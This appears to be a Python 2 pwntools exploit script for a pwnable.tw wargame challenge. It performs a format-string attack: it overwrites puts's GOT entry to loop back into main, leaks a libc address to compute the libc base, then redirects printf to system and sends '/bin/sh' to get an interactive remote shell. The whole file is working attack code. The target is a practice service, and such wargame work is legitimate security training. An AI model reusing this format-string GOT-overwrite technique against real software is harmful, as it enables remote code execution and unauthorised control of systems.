fmtsofun.py

from pwn import *

#chk_fail_got = 0x08049a44
puts_got = 0x8049a48
printf_got = 0x8049a38
main_addr = 0x080486D3
ret_addr = 0x08048780

r = remote('pwning.pwnable.tw', 56026)
print r.recvuntil(':')

fmt = ''
fmt += p32(puts_got) + p32(puts_got+2)
printed = 8
for i in range(2):
    byte = (main_addr >> (i * 16)) & 0xFFFF
    pad = ((byte - printed) % 65536 + 65536) % 65536
    if pad > 0:
        fmt += '%%%dc' % pad
    fmt += '%%%d$hn' % (7 + i)
    printed += pad
print fmt
fmt += '|||%31$08x'
print len(fmt)

r.sendline(fmt)
print repr(fmt)
ret = r.recvrepeat(0.1)
print ret[-8:]
libc_base = int(ret[-8:], 16) - (0xf75c1a63 - 0xf75a8000)
print hex(libc_base)

elf = ELF('./libc.so.6')
system_got = libc_base + elf.symbols['system'] 
fmt = ''
fmt += p32(printf_got) + p32(printf_got+2)
printed = 8
for i in range(2):
    byte = (system_got >> (i * 16)) & 0xFFFF
    pad = ((byte - printed) % 65536 + 65536) % 65536
    if pad > 0:
        fmt += '%%%dc' % pad
    fmt += '%%%d$hn' % (7 + i)
    printed += pad
print repr(fmt)
r.sendline(fmt)
r.sendline('/bin/sh')
r.interactive()